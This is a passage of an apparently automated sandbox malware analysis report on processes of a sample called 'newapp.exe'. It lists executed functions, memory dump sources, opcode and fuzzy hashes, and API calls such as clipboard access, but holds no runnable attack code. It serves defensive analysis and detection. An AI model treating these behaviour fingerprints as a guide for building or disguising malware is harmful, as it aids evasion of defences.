$^q, xrefs: 06EBAF74

Memory Dump Source

Source File: 00000005.00000002.2959283386.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6eb0000_iNFGd6bDZX.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 61838deffafac3fb8803c387067f54403e2d553da0ab42d6e255221c7a83f2ae
Instruction ID: 151fd2be1ae73bb128596d1c14a080a532c7b7f3d2d7713d68a50b7d2ce449ee
Opcode Fuzzy Hash: 61838deffafac3fb8803c387067f54403e2d553da0ab42d6e255221c7a83f2ae
Instruction Fuzzy Hash: 6A516C30A103059FDF65DB6CE5806EEB3B6EB88314F24A539D406AB354DB35EC86CB91

Analysis Process: newapp.exePID: 7984, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	18
Total number of Limit Nodes:	2

Executed Functions

Function 01648FCC Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 01649089

Memory Dump Source

Source File: 00000007.00000002.1835213350.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1640000_newapp.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 4c39ace32d4dbbc46ce74e03f505fb18fe64647bd1e2f89472e789597152ed73
Instruction ID: a474cc7120bcb7d8841fa864df6b932f864c00cb8a403b3e6573d7009852f8f5
Opcode Fuzzy Hash: 4c39ace32d4dbbc46ce74e03f505fb18fe64647bd1e2f89472e789597152ed73
Instruction Fuzzy Hash: A341D1B0C40619CFDB24DFA9C884BDEBBB5BF49304F24816AD408AB255DB756986CF90

Function 01647B5C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 01649089

Memory Dump Source

Source File: 00000007.00000002.1835213350.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1640000_newapp.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a931fd656b0e6dcaa527ff3a77274b93e1e9078e0f6936c106c5dcc22e6ac37d
Instruction ID: 0c30639955a502b7d4635404f8717a81d5a69e62a60f9949d0dc085f3ec81f29
Opcode Fuzzy Hash: a931fd656b0e6dcaa527ff3a77274b93e1e9078e0f6936c106c5dcc22e6ac37d
Instruction Fuzzy Hash: B541DFB0D00619CFDB24DFA9C844B9EBBB5BF49304F24816AD408AB255DB756986CF90

Function 0164E778 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0164E7DE

Memory Dump Source

Source File: 00000007.00000002.1835213350.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1640000_newapp.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d012be476633ff278cb0470cb6979a3c53bb02738b54593cb539ef06c210feb6
Instruction ID: 4a0c94007702f34b9f4c91fe0c7482da6abe79b28eac705da2629884920ab955
Opcode Fuzzy Hash: d012be476633ff278cb0470cb6979a3c53bb02738b54593cb539ef06c210feb6
Instruction Fuzzy Hash: 751110B5C002498FDB10CF9AC844BDEFBF5EB88324F10842AD568A7210D379A545CFA1

Function 0146D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1834801976.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_146d000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 188726264d1539a636d32131ca2a55398ca4ae7121dfd17b5b86599d336b67c7
Instruction ID: 0d2415e5136f36810c9d260bfadd52768b06a3a318d81cfc6f2424f50772ea86
Opcode Fuzzy Hash: 188726264d1539a636d32131ca2a55398ca4ae7121dfd17b5b86599d336b67c7
Instruction Fuzzy Hash: 0E214871A00244DFDB05DF48C9C0B57BF69FB98318F20C17AD9494B36AC336E846CAA2

Function 0147D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1834845841.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_147d000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aacb61806b1f1a46ad4312b4198dec8e521bf6c7ce9860aca8f36eb4a3573d49
Instruction ID: 305fad05e8d2f510605d004ce62b7cc197801c666c653d48cb3e873a3b3983c0
Opcode Fuzzy Hash: aacb61806b1f1a46ad4312b4198dec8e521bf6c7ce9860aca8f36eb4a3573d49
Instruction Fuzzy Hash: 852125B1904280DFCB16DF58D984B56BFA5EF84318F20C56ED90A4B366C336D447CA61

Function 0147D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1834845841.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_147d000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b96c3d8d28fe2b6f5c3fafba7cec694e4447a0cab58f64c060e179e99aec9a10
Instruction ID: 5bdf06acd6d7ee79e886642930ae8d0e3cd07070ecdd6f493181d98ef05e3b62
Opcode Fuzzy Hash: b96c3d8d28fe2b6f5c3fafba7cec694e4447a0cab58f64c060e179e99aec9a10
Instruction Fuzzy Hash: C3216D755093C08FDB03CF24D994756BF71EF46218F28C5DAD8498B6A7C33A980ACB62

Function 0146D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1834801976.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_146d000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 93b95ed2d570e15665a5c53231f17a3febac1ab786e8f824732bb88a53edc4f1
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: B011D272904240CFDB02CF44D5C4B56BF71FB94314F24C2AAD9490B266C33AD456CB92

Function 0146D731 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1834801976.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_146d000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31c6b48650ff5f4ca01b1ca8b814a97e730fa4434d247c5a414c44d4854bde60
Instruction ID: 4afb7fa142440b09c3baaed94becb9d629abcdc1fc1f3d7455978678587b1bf3
Opcode Fuzzy Hash: 31c6b48650ff5f4ca01b1ca8b814a97e730fa4434d247c5a414c44d4854bde60
Instruction Fuzzy Hash: C401FC31A043849AE7104A69CD84767BFDCDF40329F18C437ED484A266C23C9840C6B3

Function 0146D730 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1834801976.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_146d000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d72a066c37a6f6f69e52ea1d0906f2d75266d01cd4709d9d21d3d68160c7471f
Instruction ID: 7e2ba252c59b0125938a4caf33dbb7370f21948eba299431f96cf94530a19da7
Opcode Fuzzy Hash: d72a066c37a6f6f69e52ea1d0906f2d75266d01cd4709d9d21d3d68160c7471f
Instruction Fuzzy Hash: 11F0C2715043849EE7108A1AC884B63FFECEB80339F18C46AED480E296C2799840CAB2

Analysis Process: newapp.exePID: 8056, Parent PID: 7984COMMON

Execution Graph

Execution Coverage:	14.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	156
Total number of Limit Nodes:	18

Executed Functions

Function 06673570 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06673CC8
$^q, xrefs: 06673C6F
$^q, xrefs: 06673C7B
$^q, xrefs: 06673CBC
$^q, xrefs: 06673C98
$^q, xrefs: 06673CA4

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 7f01a8571d30b9be17dcadef9988db928502e175c553245558424f34a51ae78c
Instruction ID: ce0bd30e1fd67d2436a34becf8925db704306a38a00d1c96078d5498986ac523
Opcode Fuzzy Hash: 7f01a8571d30b9be17dcadef9988db928502e175c553245558424f34a51ae78c
Instruction Fuzzy Hash: 7C322F31E1071ACFCB54EF75C95459DB7B2BFC9300F1086AAD409AB365EB30AA85CB91

Function 06677E68 Relevance: 3.0, Strings: 2, Instructions: 478
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 066781CB
$^q, xrefs: 066781D7

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 3d7f0ccf21b96e0f7e0ac67a92db04f776596c071d3a8dceda44c5b9855c7535
Instruction ID: 53faf030dbb83287e831bd074e4cd2188cf034a7c8dc1a40f8b94eb3ff2767a9
Opcode Fuzzy Hash: 3d7f0ccf21b96e0f7e0ac67a92db04f776596c071d3a8dceda44c5b9855c7535
Instruction Fuzzy Hash: 5302AC30B002069FDB54DF68D994AAEB7E2EF84314F248439D40A9B395DB35ED86CB91

Function 066766E0 Relevance: .8, Instructions: 825COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f460c1ebce9497f39f9f824958380abf34b90000273a292d708aaf74ae4b474
Instruction ID: bd33136d96eeb11e31cb665965ec6699e7fe63c69281973d8050405855f67fb4
Opcode Fuzzy Hash: 7f460c1ebce9497f39f9f824958380abf34b90000273a292d708aaf74ae4b474
Instruction Fuzzy Hash: BC62DF34B006049FDB54DF68D594AADBBF2EF88314F248469E40ADB395DB35EC46CBA0

Function 0667C268 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c28287254b1443f778aef75e925b19d8977c7f04513d0839a0ea2c08a0d794fd
Instruction ID: eeeb33ddf9c25b527eded4fba7ce0dd5f07037ac62f7430ca4b6ffdb3eca78cd
Opcode Fuzzy Hash: c28287254b1443f778aef75e925b19d8977c7f04513d0839a0ea2c08a0d794fd
Instruction Fuzzy Hash: 75328334B002059FDF54EB68D990BADBBB6FB88314F108529E409EB395DB35EC46CB91

Function 066756B0 Relevance: .6, Instructions: 604COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30afc641a0d095476bedb6378cebb4768b689b5251d544a59806ff1aa8f17163
Instruction ID: b6023a194893b900b77209255598e7c14c53f675cd7c53d5da572f978050b569
Opcode Fuzzy Hash: 30afc641a0d095476bedb6378cebb4768b689b5251d544a59806ff1aa8f17163
Instruction Fuzzy Hash: F622D471F002159FDF60DB64C8847AEB7A2EB84320F2484B9E85A9B345DF34ED41CB91

Function 0667B307 Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32936c4c9f6fc1ec78455596a95180830cc58e705b37f7b9497b76de9d1ba141
Instruction ID: c9fdf6c71fb9af1cef25fb798822faa54f8783eb1073e59625e22cb42b47a5a0
Opcode Fuzzy Hash: 32936c4c9f6fc1ec78455596a95180830cc58e705b37f7b9497b76de9d1ba141
Instruction Fuzzy Hash: 97228330F102099FDF64DF68D5807AEB7B5EB85310F248926E409EB395CA35DD81CBA1

Function 0667ADB0 Relevance: 10.4, Strings: 8, Instructions: 390
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0667AF88
$^q, xrefs: 0667AF5F
$^q, xrefs: 0667AF24
$^q, xrefs: 0667AED1
$^q, xrefs: 0667AF30
$^q, xrefs: 0667AF53
$^q, xrefs: 0667AEDD
$^q, xrefs: 0667AF7C

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: f89511317872587278fa745c66b4da31dc75e19363d28eccf9d50f77cb2175de
Instruction ID: aaa20f7e8da15cdafa2c57ba3de2ea943a8cf4f0f401cf9a36adf7a0fd1416c7
Opcode Fuzzy Hash: f89511317872587278fa745c66b4da31dc75e19363d28eccf9d50f77cb2175de
Instruction Fuzzy Hash: A8E17C30F1020A8FCB55EFA9D5846AEB7B2EF85304F208529D419DB395DB35E846CB91

Function 0667B730 Relevance: 8.0, Strings: 6, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0667BCC1
$^q, xrefs: 0667BCE9
$^q, xrefs: 0667BCB5
$^q, xrefs: 0667BCF5
$^q, xrefs: 0667BC8D
$^q, xrefs: 0667BC81

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 8a780d6384c458f13a1ec1eea39084c82930fd2f58f4b606e98e7bea52971d8d
Instruction ID: 2834a659d9b8ab3c0f0de1e74c2e87edd2890b25f5b4bffd2e04224e2d4f22e8
Opcode Fuzzy Hash: 8a780d6384c458f13a1ec1eea39084c82930fd2f58f4b606e98e7bea52971d8d
Instruction Fuzzy Hash: D5029B30E002099FDFA4DF68D5806ADB7B1EF85314F24892AE409DB355DB35EC86CB91

Function 0666A247 Relevance: 6.1, APIs: 4, Instructions: 145
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0666A326
GetCurrentThread.KERNEL32 ref: 0666A363
GetCurrentProcess.KERNEL32 ref: 0666A3A0
GetCurrentThreadId.KERNEL32 ref: 0666A3F9

Memory Dump Source

Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_newapp.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: a741211abead193d0c5850f6046a46511c8793a015d34b135dd7376df161aeb3
Instruction ID: 3732cc82755726b565825e6c2809d6857ac34ddcde0f168809613e01c3c6d2ff
Opcode Fuzzy Hash: a741211abead193d0c5850f6046a46511c8793a015d34b135dd7376df161aeb3
Instruction Fuzzy Hash: EB5177B09013498FDB84DFAAD9487DEBFF1EF48304F24805AE459B72A1C7349984CB65

Function 0666A299 Relevance: 6.1, APIs: 4, Instructions: 139
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0666A326
GetCurrentThread.KERNEL32 ref: 0666A363
GetCurrentProcess.KERNEL32 ref: 0666A3A0
GetCurrentThreadId.KERNEL32 ref: 0666A3F9

Memory Dump Source

Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_newapp.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6487a8ff4c7b1e08bed6641f1fbda74cf790df8ea217957d814a910bf714a250
Instruction ID: a076edceb223374dd790aa136adac735be861566209416652f5357755f3d75f3
Opcode Fuzzy Hash: 6487a8ff4c7b1e08bed6641f1fbda74cf790df8ea217957d814a910bf714a250
Instruction Fuzzy Hash: 6A5155B09003099FDB94DFAAD949BDEBBF6EB48304F208059E419B73A0C7359984CF65

Function 0666A2A8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0666A326
GetCurrentThread.KERNEL32 ref: 0666A363
GetCurrentProcess.KERNEL32 ref: 0666A3A0
GetCurrentThreadId.KERNEL32 ref: 0666A3F9

Memory Dump Source

Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_newapp.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 735b7b6a7b102b6166c7a1d219a8531359fb83f57408f036a7d3997562561384
Instruction ID: 37b6a3f784631e4237e7146001930761f674a58eb83bcf46238c1157df1b45ef
Opcode Fuzzy Hash: 735b7b6a7b102b6166c7a1d219a8531359fb83f57408f036a7d3997562561384
Instruction Fuzzy Hash: 905126B09003098FDB94DFAAD949B9EBBF1EF48314F208459E419B73A0D7359984CF65

Function 06679238 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 066792BA
$^q, xrefs: 066792C6
$^q, xrefs: 0667928B
$^q, xrefs: 0667927F

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 3ae26e77ed3c74604402781f06d27a0a8374a7464d203645b774a13937cd382b
Instruction ID: ac6ed335eda5bb09c7aa75dd6b2bd92d41f53dc3a629430b0bd6e82f3c43faaa
Opcode Fuzzy Hash: 3ae26e77ed3c74604402781f06d27a0a8374a7464d203645b774a13937cd382b
Instruction Fuzzy Hash: 74915F30B1021A9FDB54DF65D9507AFB7F6AB89308F108569C40DEB788EE30ED468B91

Function 0667D038 Relevance: 4.6, Strings: 3, Instructions: 801
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0667D443
$^q, xrefs: 0667D437
$^q, xrefs: 0667D42F

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: 373fc180e3cae144e6187b38e38b39a125ee1a9be7c35a66f5fe95d95b917358
Instruction ID: ff3fa9f3e63d222be55e2abcf5897576c3602de4477d98f84de4bcf37c28c30f
Opcode Fuzzy Hash: 373fc180e3cae144e6187b38e38b39a125ee1a9be7c35a66f5fe95d95b917358
Instruction Fuzzy Hash: A3626430A002059FCB55EF68D690A5DB7F2FF84708F248969D0099F769DB71ED8ACB90

Function 06674C78 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Ocq, xrefs: 06674E53
XPcq, xrefs: 06674DC9
fcq, xrefs: 06674CA3

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID: fcq$XPcq$\Ocq
API String ID: 0-3575482020
Opcode ID: ae5eb8e57807a46a66bf31e6b8893b990b43af739a1fbff3dc8717e715540e3b
Instruction ID: 6caae142963723abc703b9c60ea26c3751622094e978b3a54e275fbe133478fc
Opcode Fuzzy Hash: ae5eb8e57807a46a66bf31e6b8893b990b43af739a1fbff3dc8717e715540e3b
Instruction Fuzzy Hash: 31616330F002189FDB549FA8C8547AEBBF6EB88710F208529E109EB395DF754D458BA1

Function 06679228 Relevance: 2.7, Strings: 2, Instructions: 165
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 066792BA
$^q, xrefs: 0667927F

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 1a04512cbd11c7adec24ea83074d1aaa192e2f7e635423be91b46bdf6eab0de2
Instruction ID: 1c4f150f1bdcaa1d5b08284ab190ff222e2190d6bf19644e163a2f89a30fdd4b
Opcode Fuzzy Hash: 1a04512cbd11c7adec24ea83074d1aaa192e2f7e635423be91b46bdf6eab0de2
Instruction Fuzzy Hash: 26514F30B102059FDB54EB75D9A0BAF77F6ABC8748F108529D409EB789EA349C43CB91

Function 06674C69 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

XPcq, xrefs: 06674DC9
fcq, xrefs: 06674CA3

Memory Dump Source

Source File: 0000000A.00000002.2958449677.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6670000_newapp.jbxd

Similarity

API ID:
String ID: fcq$XPcq
API String ID: 0-936005338
Opcode ID: 3bf952fa9e02c7a0fadd19b236f181e2aaf788b5ebcedf8e233a9a825540b430
Instruction ID: 8061c1c8cc13a82cbddbf2e773b3ff5a08fa8bdf0dbb7e6518cbd15a7ceed9db
Opcode Fuzzy Hash: 3bf952fa9e02c7a0fadd19b236f181e2aaf788b5ebcedf8e233a9a825540b430
Instruction Fuzzy Hash: 7E517170F002089FDB55DFB9C854BAEBBF6EF88710F208529E105AB395DE758D018BA1

Function 06665370 Relevance: 1.8, APIs: 1, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_newapp.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: da0b982645b8c7c8da6e863033e4f5fff751eb3978791ed3f8bc72a73a40ffa4
Instruction ID: 748119c633f5b046f164e9b81339d37e2fb99d5697d436695273b62fbb9a89c9
Opcode Fuzzy Hash: da0b982645b8c7c8da6e863033e4f5fff751eb3978791ed3f8bc72a73a40ffa4
Instruction Fuzzy Hash: 76B19C70A007059FCB84EF6AD49166EBBF2FF88314B10896DE40ACB355DB74E846CB94

Function 028CEE98 Relevance: 1.6, APIs: 1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2925916993.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_28c0000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32dd4d43fdf5b3e6c020af177319ade1698d6f28e3f235819f2d6bb3790b3b4f
Instruction ID: 35b20aa0242e0f47cb5c368a2ac1436a01009f6fa79def01c5f2bb34216ca6d2
Opcode Fuzzy Hash: 32dd4d43fdf5b3e6c020af177319ade1698d6f28e3f235819f2d6bb3790b3b4f
Instruction Fuzzy Hash: CA414371D043858FCB00CFB9D8046AEBFF5EF89310F1586AAD408EB692DB749844CBA1

Function 0666674F Relevance: 1.6, APIs: 1, Instructions: 119COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0666686A

Memory Dump Source

Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_newapp.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: fc5a4cbf93325c84039da84183f6f49be6b56626c61f034ad889ae832e0d59aa
Instruction ID: d6513e278569321d0774d74e7f451feae84a4cd23dc37a3de9c3c68443082e2c
Opcode Fuzzy Hash: fc5a4cbf93325c84039da84183f6f49be6b56626c61f034ad889ae832e0d59aa
Instruction Fuzzy Hash: E951C3B5D00319AFDB14CFAAD984ADEBFB5BF48310F24852AE419AB310D771A845CF91

Function 06666758 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0666686A

Memory Dump Source

Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_newapp.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4db249f43975086398eef173998436631f94d6833fe92ff01479a148ca1489c9
Instruction ID: 04c9f641de20486c97a97a69b6b4a2ebe25fb70a159a2ca570f03766bc1c19b7
Opcode Fuzzy Hash: 4db249f43975086398eef173998436631f94d6833fe92ff01479a148ca1489c9
Instruction Fuzzy Hash: 0641B1B1D00319AFDB14CFAAD984ADEBFB5FF48310F24852AE419AB210D771A845CF91

Function 0666A274 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 0666B851

Memory Dump Source

Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_newapp.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: a6ae80c800db1e0cf88649a189724a5f941cbf339edabf2d8c9d5dc1d61d0eb3
Instruction ID: 027341800e82c70fc406437c693077d72e9477c32e2ee6012e8ca8ece83d6b0d
Opcode Fuzzy Hash: a6ae80c800db1e0cf88649a189724a5f941cbf339edabf2d8c9d5dc1d61d0eb3
Instruction Fuzzy Hash: C74129B4900309DFDB54CF5AD448AAABBF5FB88314F14C459E519AB321D770A851CFA0

Function 0666C0D4 Relevance: 1.6, APIs: 1, Instructions: 76comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 0666C168

Memory Dump Source

Source File: 0000000A.00000002.2958216059.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6660000_newapp.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 37b874d9aa69a7fa76dea05a706c2b6529b52c740ef6c6952173aa13f9788f5b
Instruction ID: cdae2cf2a779bfe004ae0326290829d035778fe4aaee5123fb0eb7a2d28f539d
Opcode Fuzzy Hash: 37b874d9aa69a7fa76dea05a706c2b6529b52c740ef6c6952173aa13f9788f5b
Instruction Fuzzy Hash: 9D3102B0E01648EFDB54DFA9D984BCEBBF5AB48304F248019E444BB290DB74A945CBA5

Function 0666C0E0 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

